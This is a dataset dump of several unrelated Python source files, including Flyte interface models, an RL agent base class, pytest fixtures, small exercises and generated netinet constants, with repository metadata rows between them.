    def batch_delete_entities(self, request: BatchDeleteEntitiesRequest) -> BatchDeleteEntitiesResponse:
        response: BatchDeleteEntitiesResponse = self.stub.BatchDeleteEntities(request, metadata=self.metadata)
        return response

    def list_entities(self, request: ListEntitiesRequest) -> ListEntitiesResponse:
        response: ListEntitiesResponse = self.stub.ListEntities(request, metadata=self.metadata)
        return response
| 43.360825 | 110 | 0.771992 | 410 | 4,206 | 7.834146 | 0.326829 | 0.041096 | 0.070984 | 0.100872 | 0.325654 | 0.252802 | 0.236613 | 0.16812 | 0.152864 | 0.078456 | 0 | 0.003397 | 0.16001 | 4,206 | 96 | 111 | 43.8125 | 0.905746 | 0.157394 | 0 | 0.233333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216667 | false | 0 | 0.083333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
5333d273552f348afd8e96dd02ae9877a8fb3e72 | 460 | py | Python | nefertari/authentication/__init__.py | nikitagromov/nefertari | 1e3829bba4008a8014a3a5f23521a082bfd06ecd | [
"Apache-2.0"
] | 34 | 2015-03-27T16:00:38.000Z | 2016-01-26T02:15:47.000Z | nefertari/authentication/__init__.py | nikitagromov/nefertari | 1e3829bba4008a8014a3a5f23521a082bfd06ecd | [
"Apache-2.0"
] | 17 | 2016-01-29T09:29:23.000Z | 2020-03-29T19:24:04.000Z | nefertari/authentication/__init__.py | nikitagromov/nefertari | 1e3829bba4008a8014a3a5f23521a082bfd06ecd | [
"Apache-2.0"
] | 10 | 2016-02-19T08:35:14.000Z | 2020-03-29T11:37:02.000Z | def includeme(config):
""" Set up event subscribers. """
from .models import (
AuthUserMixin,
random_uuid,
lower_strip,
encrypt_password,
)
add_proc = config.add_field_processors
add_proc(
[random_uuid, lower_strip],
model=AuthUserMixin, field='username')
add_proc([lower_strip], model=AuthUserMixin, field='email')
add_proc([encrypt_password], model=AuthUserMixin, field='password')
| 30.666667 | 71 | 0.658696 | 49 | 460 | 5.918367 | 0.489796 | 0.096552 | 0.237931 | 0.137931 | 0.227586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.232609 | 460 | 14 | 72 | 32.857143 | 0.82153 | 0.054348 | 0 | 0 | 0 | 0 | 0.04918 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.153846 | 0.076923 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
5349cf7c5f6cad078a8fe8575862067acb6265ff | 2,797 | py | Python | rlib/algorithms/base.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | 1 | 2019-09-08T08:33:13.000Z | 2019-09-08T08:33:13.000Z | rlib/algorithms/base.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | 26 | 2019-03-15T03:11:21.000Z | 2022-03-11T23:42:46.000Z | rlib/algorithms/base.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | null | null | null | import os
from abc import ABC, abstractmethod
import torch
class Agent(ABC):
    """Default Agent implementation.

    All other agents must inherit this class.
    """

    REQUIRED_HYPERPARAMETERS = {}
    ALGORITHM = None

    def __init__(self, *args, **kwargs):
        """Shared Agent initialization."""
        if "new_hyperparameters" in kwargs:
            if isinstance(kwargs["new_hyperparameters"], dict):
                self._set_hyperparameters(kwargs["new_hyperparameters"])

        # Converts each hyperparameter into an attribute
        # This minimizes the code written to use the hyperparameters
        for key, value in self.REQUIRED_HYPERPARAMETERS.items():
            setattr(self, key.upper(), value)

    @abstractmethod
    def origin(self):
        pass

    @abstractmethod
    def description(self):
        pass

    def reset(self):
        """Resets noise."""
        if hasattr(self, "noise"):
            self.noise.reset()

    def act(self, state, add_noise=False, logger=None):
        """Default `act` implementation."""
        pass

    def step(self, state, action, reward, next_state, done, logger=None):
        """Default `step` implementation."""
        pass

    def learn(self, experiences, logger=None):
        """Default `learn` implementation."""
        pass

    def update(self, rewards, logger=None):
        """Default `update` implementation."""
        pass

    def get_hyperparameters(self):
        """Returns the current state of the required hyperparameters.

        Returns:
            A dictionary of hyperparameters.
        """
        return self.REQUIRED_HYPERPARAMETERS

    def _set_hyperparameters(self, new_hyperparameters):
        """Adds user-defined hyperparameter values to the list of required hyperparameters.

        Args:
            new_hyperparameters: A dictionary containing the new hyperparameter values.
        """
        for key, value in new_hyperparameters.items():
            if key in self.REQUIRED_HYPERPARAMETERS.keys():
                self.REQUIRED_HYPERPARAMETERS[key] = value

    def save_state_dicts(self):
        """Save state dicts to file."""
        if not self.model_output_dir:
            return

        for sd in self.state_dicts:
            torch.save(
                sd[0].state_dict(),
                os.path.join(self.model_output_dir, "{}.pth".format(sd[1]))
            )

    def load_state_dicts(self):
        """Load state dicts from file."""
        if not self.model_output_dir:
            raise Exception("You must provide an input directory to load state dict.")

        for sd in self.state_dicts:
            sd[0].load_state_dict(
                torch.load(os.path.join(self.model_output_dir, "{}.pth".format(sd[1])))
            )
| 29.755319 | 88 | 0.610297 | 307 | 2,797 | 5.433225 | 0.351792 | 0.096523 | 0.064748 | 0.043165 | 0.105516 | 0.105516 | 0.080336 | 0.047962 | 0.047962 | 0.047962 | 0 | 0.002012 | 0.289238 | 2,797 | 93 | 89 | 30.075269 | 0.837022 | 0.240615 | 0 | 0.24 | 0 | 0 | 0.064629 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0.12 | 0.06 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
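The `__init__`/`_set_hyperparameters` interplay above can be shown without torch: a subclass declares its `REQUIRED_HYPERPARAMETERS`, user overrides are merged in (unknown keys ignored), and each key becomes an upper-case attribute. A dependency-free sketch, not the rlib code itself:

```python
class MiniAgent:
    REQUIRED_HYPERPARAMETERS = {"gamma": 0.99, "lr": 1e-3}

    def __init__(self, new_hyperparameters=None):
        if isinstance(new_hyperparameters, dict):
            # Only keys the algorithm declares are accepted; unknown
            # keys are silently ignored, as in _set_hyperparameters.
            for key, value in new_hyperparameters.items():
                if key in self.REQUIRED_HYPERPARAMETERS:
                    self.REQUIRED_HYPERPARAMETERS[key] = value
        # Expose each hyperparameter as an UPPER_CASE attribute.
        for key, value in self.REQUIRED_HYPERPARAMETERS.items():
            setattr(self, key.upper(), value)


agent = MiniAgent({"lr": 5e-4, "batch_size": 64})
print(agent.GAMMA)                   # 0.99 (default kept)
print(agent.LR)                      # 0.0005 (override applied)
print(hasattr(agent, "BATCH_SIZE"))  # False (unknown key ignored)
```

Note one quirk inherited from the original: the overrides mutate the class-level dictionary, so they would be visible to later instances of the same class.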
5364d39c3e0e891a83a6bc6736093798bb52c498 | 7,292 | py | Python | flytekit/models/interface.py | slai/flytekit | 9d73d096b748d263a638e6865d15db4880845305 | [
"Apache-2.0"
] | null | null | null | flytekit/models/interface.py | slai/flytekit | 9d73d096b748d263a638e6865d15db4880845305 | [
"Apache-2.0"
] | 2 | 2021-06-26T04:32:43.000Z | 2021-07-14T04:47:52.000Z | flytekit/models/interface.py | slai/flytekit | 9d73d096b748d263a638e6865d15db4880845305 | [
"Apache-2.0"
] | null | null | null | import typing
import six as _six
from flyteidl.core import interface_pb2 as _interface_pb2
from flytekit.models import common as _common
from flytekit.models import literals as _literals
from flytekit.models import types as _types
class Variable(_common.FlyteIdlEntity):
    def __init__(self, type, description):
        """
        :param flytekit.models.types.LiteralType type: This describes the type of value that must be provided to
            satisfy this variable.
        :param Text description: This is a help string that can provide context for what this variable means in relation
            to a task or workflow.
        """
        self._type = type
        self._description = description

    @property
    def type(self):
        """
        This describes the type of value that must be provided to satisfy this variable.

        :rtype: flytekit.models.types.LiteralType
        """
        return self._type

    @property
    def description(self):
        """
        This is a help string that can provide context for what this variable means in relation to a task or workflow.

        :rtype: Text
        """
        return self._description

    def to_flyte_idl(self):
        """
        :rtype: flyteidl.core.interface_pb2.Variable
        """
        return _interface_pb2.Variable(type=self.type.to_flyte_idl(), description=self.description)

    @classmethod
    def from_flyte_idl(cls, variable_proto):
        """
        :param flyteidl.core.interface_pb2.Variable variable_proto:
        :rtype: Variable
        """
        return cls(
            type=_types.LiteralType.from_flyte_idl(variable_proto.type),
            description=variable_proto.description,
        )
class VariableMap(_common.FlyteIdlEntity):
    def __init__(self, variables):
        """
        A map of Variables.

        :param dict[Text, Variable] variables:
        """
        self._variables = variables

    @property
    def variables(self):
        """
        :rtype: dict[Text, Variable]
        """
        return self._variables

    def to_flyte_idl(self):
        """
        :rtype: flyteidl.core.interface_pb2.VariableMap
        """
        return _interface_pb2.VariableMap(variables={k: v.to_flyte_idl() for k, v in _six.iteritems(self.variables)})

    @classmethod
    def from_flyte_idl(cls, pb2_object):
        """
        :param flyteidl.core.interface_pb2.VariableMap pb2_object:
        :rtype: VariableMap
        """
        return cls({k: Variable.from_flyte_idl(v) for k, v in _six.iteritems(pb2_object.variables)})
class TypedInterface(_common.FlyteIdlEntity):
    def __init__(self, inputs, outputs):
        """
        Please note that this model is slightly incorrect, but is more user-friendly. The underlying inputs and
        outputs are represented directly as Python dicts, rather than going through the additional VariableMap layer.

        :param dict[Text, Variable] inputs: This defines the names and types for the interface's inputs.
        :param dict[Text, Variable] outputs: This defines the names and types for the interface's outputs.
        """
        self._inputs = inputs
        self._outputs = outputs

    @property
    def inputs(self) -> typing.Dict[str, Variable]:
        return self._inputs

    @property
    def outputs(self) -> typing.Dict[str, Variable]:
        return self._outputs

    def to_flyte_idl(self) -> _interface_pb2.TypedInterface:
        return _interface_pb2.TypedInterface(
            inputs=_interface_pb2.VariableMap(variables={k: v.to_flyte_idl() for k, v in _six.iteritems(self.inputs)}),
            outputs=_interface_pb2.VariableMap(
                variables={k: v.to_flyte_idl() for k, v in _six.iteritems(self.outputs)}
            ),
        )

    @classmethod
    def from_flyte_idl(cls, proto: _interface_pb2.TypedInterface) -> "TypedInterface":
        """
        :param proto:
        """
        return cls(
            inputs={k: Variable.from_flyte_idl(v) for k, v in _six.iteritems(proto.inputs.variables)},
            outputs={k: Variable.from_flyte_idl(v) for k, v in _six.iteritems(proto.outputs.variables)},
        )
class Parameter(_common.FlyteIdlEntity):
    def __init__(self, var, default=None, required=None):
        """
        Declares an input parameter. A parameter is used as input to a launch plan and has
        the special ability to have a default value or mark itself as required.

        :param Variable var: Defines a name and a type to reference/compare throughout the system.
        :param flytekit.models.literals.Literal default: [Optional] Defines a default value that has to match the
            variable type defined.
        :param bool required: [Optional] is this value required to be filled in?
        """
        self._var = var
        self._default = default
        self._required = required

    @property
    def var(self):
        """
        The variable definition for this input parameter.

        :rtype: Variable
        """
        return self._var

    @property
    def default(self):
        """
        This is the default literal value that will be applied for this parameter if not user specified.

        :rtype: flytekit.models.literals.Literal
        """
        return self._default

    @property
    def required(self) -> bool:
        """
        If True, this parameter must be specified. There cannot be a default value.

        :rtype: bool
        """
        return self._required

    @property
    def behavior(self):
        """
        :rtype: T
        """
        return self._default or self._required

    def to_flyte_idl(self):
        """
        :rtype: flyteidl.core.interface_pb2.Parameter
        """
        return _interface_pb2.Parameter(
            var=self.var.to_flyte_idl(),
            default=self.default.to_flyte_idl() if self.default is not None else None,
            required=self.required if self.default is None else None,
        )

    @classmethod
    def from_flyte_idl(cls, pb2_object):
        """
        :param flyteidl.core.interface_pb2.Parameter pb2_object:
        :rtype: Parameter
        """
        return cls(
            Variable.from_flyte_idl(pb2_object.var),
            _literals.Literal.from_flyte_idl(pb2_object.default) if pb2_object.HasField("default") else None,
            pb2_object.required if pb2_object.HasField("required") else None,
        )
class ParameterMap(_common.FlyteIdlEntity):
    def __init__(self, parameters):
        """
        A map of Parameters.

        :param dict[Text, Parameter] parameters:
        """
        self._parameters = parameters

    @property
    def parameters(self):
        """
        :rtype: dict[Text, Parameter]
        """
        return self._parameters

    def to_flyte_idl(self):
        """
        :rtype: flyteidl.core.interface_pb2.ParameterMap
        """
        return _interface_pb2.ParameterMap(
            parameters={k: v.to_flyte_idl() for k, v in _six.iteritems(self.parameters)},
        )

    @classmethod
    def from_flyte_idl(cls, pb2_object):
        """
        :param flyteidl.core.interface_pb2.ParameterMap pb2_object:
        :rtype: ParameterMap
        """
        return cls(parameters={k: Parameter.from_flyte_idl(v) for k, v in _six.iteritems(pb2_object.parameters)})
| 32.553571 | 120 | 0.63316 | 865 | 7,292 | 5.163006 | 0.160694 | 0.042991 | 0.02687 | 0.012539 | 0.365876 | 0.298477 | 0.268697 | 0.253023 | 0.253023 | 0.243395 | 0 | 0.005697 | 0.277839 | 7,292 | 223 | 121 | 32.699552 | 0.842385 | 0.32186 | 0 | 0.247525 | 0 | 0 | 0.006804 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.247525 | false | 0 | 0.059406 | 0.029703 | 0.554455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7258c7079413485094581655431edc0bdeab64d7 | 933 | py | Python | binary-search.py | derekmpham/interview-prep | 5881f03de3ffeeecca460e71b531f07e1dae7e46 | [
"MIT"
] | null | null | null | binary-search.py | derekmpham/interview-prep | 5881f03de3ffeeecca460e71b531f07e1dae7e46 | [
"MIT"
] | null | null | null | binary-search.py | derekmpham/interview-prep | 5881f03de3ffeeecca460e71b531f07e1dae7e46 | [
"MIT"
] | null | null | null | # iterative approach to binary search function (assume list has distinct elements and elements are in ascending order)
def binary_search(arr, data):
    low = 0  # first element position in array
    high = len(arr) - 1  # last element position in array
    while low <= high:  # iterate through "entire" array
        middle = (low + high) // 2  # floor division so middle is a valid integer index
        if arr[middle] == data:
            return middle
        elif arr[middle] < data:
            low = middle + 1  # narrow down search to upper half
        else:
            high = middle - 1  # narrow down search to bottom half
    return -1  # data not in array


# test cases
test = [1, 4, 5, 7, 8, 9, 11, 17, 19, 26, 32, 35, 36]
data_one = 11
data_two = 4
data_three = 35
data_four = 27
data_five = 38

print(binary_search(test, data_one))    # prints 6
print(binary_search(test, data_two))    # prints 1
print(binary_search(test, data_three))  # prints 11
print(binary_search(test, data_four))   # prints -1
print(binary_search(test, data_five))   # prints -1
| 31.1 | 118 | 0.708467 | 155 | 933 | 4.16129 | 0.445161 | 0.130233 | 0.131783 | 0.162791 | 0.293023 | 0.176744 | 0.099225 | 0 | 0 | 0 | 0 | 0.054886 | 0.199357 | 933 | 29 | 119 | 32.172414 | 0.808568 | 0.379421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.217391 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
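For sorted lists like the one above, Python's standard library already provides the same halving search in the `bisect` module; a membership lookup can be built on `bisect_left`:

```python
import bisect


def binary_search_bisect(arr, data):
    """Return the index of data in sorted arr, or -1 if absent."""
    i = bisect.bisect_left(arr, data)  # leftmost insertion point for data
    if i < len(arr) and arr[i] == data:
        return i
    return -1


test = [1, 4, 5, 7, 8, 9, 11, 17, 19, 26, 32, 35, 36]
print(binary_search_bisect(test, 11))  # 6
print(binary_search_bisect(test, 27))  # -1
```

The bounds check `i < len(arr)` matters: for a value larger than every element, `bisect_left` returns `len(arr)`, which would otherwise index past the end.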
725b4074b04ad16b7633d15c37467b95f226f606 | 236 | py | Python | jygoto/gototest.py | agren/jython-goto | 344a061cc81097fc01252d827d0c4d3c024ce9ec | [
"CNRI-Jython"
] | null | null | null | jygoto/gototest.py | agren/jython-goto | 344a061cc81097fc01252d827d0c4d3c024ce9ec | [
"CNRI-Jython"
] | null | null | null | jygoto/gototest.py | agren/jython-goto | 344a061cc81097fc01252d827d0c4d3c024ce9ec | [
"CNRI-Jython"
] | null | null | null | # If everything works this script should print:
# Goto test
# Hello
# World!
#
from jygoto import goto
from jygoto import label
print "Goto test"
goto .my_label
print "Goodbye"
label .my_label
print "Hello"
print "World!"
| 14.75 | 47 | 0.707627 | 34 | 236 | 4.852941 | 0.5 | 0.181818 | 0.157576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216102 | 236 | 15 | 48 | 15.733333 | 0.891892 | 0.338983 | 0 | 0 | 0 | 0 | 0.18 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.25 | null | null | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
72652e03333656edaa08f0f06d5503faee83cba4 | 724 | py | Python | cap-3/exercicios/Exercicio-3.3.py | JeffeSilva/EP-python | a4d8ccb727ab9e10785b2dfd219cff72e0d808f5 | [
"MIT"
] | 1 | 2021-01-07T12:43:48.000Z | 2021-01-07T12:43:48.000Z | cap-3/exercicios/Exercicio-3.3.py | JeffeSilva/EP-python | a4d8ccb727ab9e10785b2dfd219cff72e0d808f5 | [
"MIT"
] | null | null | null | cap-3/exercicios/Exercicio-3.3.py | JeffeSilva/EP-python | a4d8ccb727ab9e10785b2dfd219cff72e0d808f5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Exercise 3.3 - Complete the following table using a = True, b = False and c = True
print (' ')
a = True
b = False
c = True
# Expressions and results
a1 = a and a
b1 = b and b
c1 = not c
d1 = not b
e1 = not a
f1 = a and b
g1 = b and c
h1 = a or c
i1 = b or c
j1 = c or a
k1 = c or b
l1 = c or c
m1 = b or b
# Results on screen
print (f'a and a -/- {a1}')
print (f'b and b -/- {b1}')
print (f'not c -/- {c1}')
print (f'not b -/- {d1}')
print (f'not a -/- {e1}')
print (f'a and b -/- {f1}')
print (f'b and c -/- {g1}')
print (f'a or c -/- {h1}')
print (f'b or c -/- {i1}')
print (f'c or a -/- {j1}')
print (f'c or b -/- {k1}')
print (f'c or c -/- {l1}')
print (f'b or b -/- {m1}')
print (' ')
| 19.567568 | 86 | 0.524862 | 158 | 724 | 2.405063 | 0.240506 | 0.205263 | 0.073684 | 0.071053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052336 | 0.26105 | 724 | 36 | 87 | 20.111111 | 0.657944 | 0.203039 | 0 | 0.064516 | 0 | 0 | 0.356643 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.483871 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
7266f0df3ad29b9d103b31ee5894b5b4e55f6020 | 58 | py | Python | mlflow/version.py | parkerzf/mlflow | 58f70d522d439ab26f777dbd32de77f79c0235bc | [
"Apache-2.0"
] | 12 | 2018-08-11T08:25:31.000Z | 2018-08-28T23:41:23.000Z | mlflow/version.py | parkerzf/mlflow | 58f70d522d439ab26f777dbd32de77f79c0235bc | [
"Apache-2.0"
] | 17 | 2018-08-11T00:26:26.000Z | 2018-08-29T10:14:17.000Z | mlflow/version.py | parkerzf/mlflow | 58f70d522d439ab26f777dbd32de77f79c0235bc | [
"Apache-2.0"
] | 3 | 2018-08-21T15:14:51.000Z | 2019-11-06T23:25:32.000Z | # Copyright 2018 Databricks, Inc.
VERSION = '0.7.0.dev'
| 11.6 | 33 | 0.672414 | 9 | 58 | 4.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 0.172414 | 58 | 4 | 34 | 14.5 | 0.666667 | 0.534483 | 0 | 0 | 0 | 0 | 0.36 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7267bcbd42dccb7add74ade4734c01f0858c1918 | 1,226 | py | Python | pytest_config/fixtures.py | buzzfeed/pytest_config | 86bdc1fecec46d7b944998704534c73cb16ddd43 | [
"MIT"
] | 4 | 2015-07-27T08:17:24.000Z | 2016-07-24T15:44:16.000Z | pytest_config/fixtures.py | buzzfeed/pytest_config | 86bdc1fecec46d7b944998704534c73cb16ddd43 | [
"MIT"
] | null | null | null | pytest_config/fixtures.py | buzzfeed/pytest_config | 86bdc1fecec46d7b944998704534c73cb16ddd43 | [
"MIT"
] | 2 | 2018-03-04T21:49:52.000Z | 2018-05-25T20:10:25.000Z | from .logger import logger
from . import pretty
import pytest
def _error(e):
error = '{}: {}'.format(type(e).__name__, str(e))
logger.debug(pretty.colorize_text(error, color=pretty.YELLOW))
@pytest.fixture(scope='module')
def timezone():
""" A shortcut to the `django.utils.timezone` module. """
from django.utils import timezone
return timezone
@pytest.fixture(scope='module')
def pytz():
""" A shortcut to the `pytz` module. """
import pytz
return pytz
@pytest.fixture(scope='module')
def json():
""" A shortcut to the `json` module. """
import json
return json
@pytest.fixture(scope='module')
def mock():
"""
A shortcut to the `mock` module. If mock is not installed,
an error will be logged and no module will be available.
"""
try:
import mock
return mock
except ImportError as e:
_error(e)
@pytest.fixture(scope='module')
def model_mommy():
"""
A shortcut to the `model_mommy.mommy` module. If model_mommy is not
installed, an error will be logged and no module will be available.
"""
try:
from model_mommy import mommy
return mommy
except ImportError as e:
_error(e)
| 21.892857 | 71 | 0.644372 | 166 | 1,226 | 4.686747 | 0.289157 | 0.083548 | 0.115681 | 0.154242 | 0.399743 | 0.226221 | 0.159383 | 0.159383 | 0.159383 | 0.159383 | 0 | 0 | 0.239804 | 1,226 | 55 | 72 | 22.290909 | 0.834764 | 0.300979 | 0 | 0.34375 | 0 | 0 | 0.045056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.3125 | 0 | 0.65625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
726890c74100dd5874d4d8acf6f69d3b76ae031c | 14,614 | py | Python | lib-python/2.5.2/plat-linux2/IN.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | 1 | 2019-05-27T00:58:46.000Z | 2019-05-27T00:58:46.000Z | lib-python/2.5.2/plat-linux2/IN.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | null | null | null | lib-python/2.5.2/plat-linux2/IN.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | null | null | null | # Generated by h2py from /usr/include/netinet/in.h
_NETINET_IN_H = 1
# Included from features.h
_FEATURES_H = 1
__USE_ANSI = 1
__FAVOR_BSD = 1
_ISOC99_SOURCE = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 199506L
_XOPEN_SOURCE = 600
_XOPEN_SOURCE_EXTENDED = 1
_LARGEFILE64_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
__USE_ISOC99 = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 2
_POSIX_C_SOURCE = 199506L
__USE_POSIX = 1
__USE_POSIX2 = 1
__USE_POSIX199309 = 1
__USE_POSIX199506 = 1
__USE_XOPEN = 1
__USE_XOPEN_EXTENDED = 1
__USE_UNIX98 = 1
_LARGEFILE_SOURCE = 1
__USE_XOPEN2K = 1
__USE_ISOC99 = 1
__USE_XOPEN_EXTENDED = 1
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_FILE_OFFSET64 = 1
__USE_MISC = 1
__USE_BSD = 1
__USE_SVID = 1
__USE_GNU = 1
__USE_REENTRANT = 1
__STDC_IEC_559__ = 1
__STDC_IEC_559_COMPLEX__ = 1
__STDC_ISO_10646__ = 200009L
__GNU_LIBRARY__ = 6
__GLIBC__ = 2
__GLIBC_MINOR__ = 2
# Included from sys/cdefs.h
_SYS_CDEFS_H = 1
def __PMT(args): return args
def __P(args): return args
def __PMT(args): return args
def __STRING(x): return #x
__flexarr = []
__flexarr = [0]
__flexarr = []
__flexarr = [1]
def __ASMNAME(cname): return __ASMNAME2 (__USER_LABEL_PREFIX__, cname)
def __attribute__(xyz): return
def __attribute_format_arg__(x): return __attribute__ ((__format_arg__ (x)))
def __attribute_format_arg__(x): return
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_EXTERN_INLINES = 1
# Included from gnu/stubs.h
# Included from stdint.h
_STDINT_H = 1
# Included from bits/wchar.h
_BITS_WCHAR_H = 1
__WCHAR_MIN = (-2147483647l - 1l)
__WCHAR_MAX = (2147483647l)
# Included from bits/wordsize.h
__WORDSIZE = 32
def __INT64_C(c): return c ## L
def __UINT64_C(c): return c ## UL
def __INT64_C(c): return c ## LL
def __UINT64_C(c): return c ## ULL
INT8_MIN = (-128)
INT16_MIN = (-32767-1)
INT32_MIN = (-2147483647-1)
INT64_MIN = (-__INT64_C(9223372036854775807)-1)
INT8_MAX = (127)
INT16_MAX = (32767)
INT32_MAX = (2147483647)
INT64_MAX = (__INT64_C(9223372036854775807))
UINT8_MAX = (255)
UINT16_MAX = (65535)
UINT64_MAX = (__UINT64_C(18446744073709551615))
INT_LEAST8_MIN = (-128)
INT_LEAST16_MIN = (-32767-1)
INT_LEAST32_MIN = (-2147483647-1)
INT_LEAST64_MIN = (-__INT64_C(9223372036854775807)-1)
INT_LEAST8_MAX = (127)
INT_LEAST16_MAX = (32767)
INT_LEAST32_MAX = (2147483647)
INT_LEAST64_MAX = (__INT64_C(9223372036854775807))
UINT_LEAST8_MAX = (255)
UINT_LEAST16_MAX = (65535)
UINT_LEAST64_MAX = (__UINT64_C(18446744073709551615))
INT_FAST8_MIN = (-128)
INT_FAST16_MIN = (-9223372036854775807L-1)
INT_FAST32_MIN = (-9223372036854775807L-1)
INT_FAST16_MIN = (-2147483647-1)
INT_FAST32_MIN = (-2147483647-1)
INT_FAST64_MIN = (-__INT64_C(9223372036854775807)-1)
INT_FAST8_MAX = (127)
INT_FAST16_MAX = (9223372036854775807L)
INT_FAST32_MAX = (9223372036854775807L)
INT_FAST16_MAX = (2147483647)
INT_FAST32_MAX = (2147483647)
INT_FAST64_MAX = (__INT64_C(9223372036854775807))
UINT_FAST8_MAX = (255)
UINT_FAST64_MAX = (__UINT64_C(18446744073709551615))
INTPTR_MIN = (-9223372036854775807L-1)
INTPTR_MAX = (9223372036854775807L)
INTPTR_MIN = (-2147483647-1)
INTPTR_MAX = (2147483647)
INTMAX_MIN = (-__INT64_C(9223372036854775807)-1)
INTMAX_MAX = (__INT64_C(9223372036854775807))
UINTMAX_MAX = (__UINT64_C(18446744073709551615))
PTRDIFF_MIN = (-9223372036854775807L-1)
PTRDIFF_MAX = (9223372036854775807L)
PTRDIFF_MIN = (-2147483647-1)
PTRDIFF_MAX = (2147483647)
SIG_ATOMIC_MIN = (-2147483647-1)
SIG_ATOMIC_MAX = (2147483647)
WCHAR_MIN = __WCHAR_MIN
WCHAR_MAX = __WCHAR_MAX
def INT8_C(c): return c
def INT16_C(c): return c
def INT32_C(c): return c
def INT64_C(c): return c ## L
def INT64_C(c): return c ## LL
def UINT8_C(c): return c ## U
def UINT16_C(c): return c ## U
def UINT32_C(c): return c ## U
def UINT64_C(c): return c ## UL
def UINT64_C(c): return c ## ULL
def INTMAX_C(c): return c ## L
def UINTMAX_C(c): return c ## UL
def INTMAX_C(c): return c ## LL
def UINTMAX_C(c): return c ## ULL
# Included from bits/types.h
_BITS_TYPES_H = 1
__FD_SETSIZE = 1024
# Included from bits/pthreadtypes.h
_BITS_PTHREADTYPES_H = 1
# Included from bits/sched.h
SCHED_OTHER = 0
SCHED_FIFO = 1
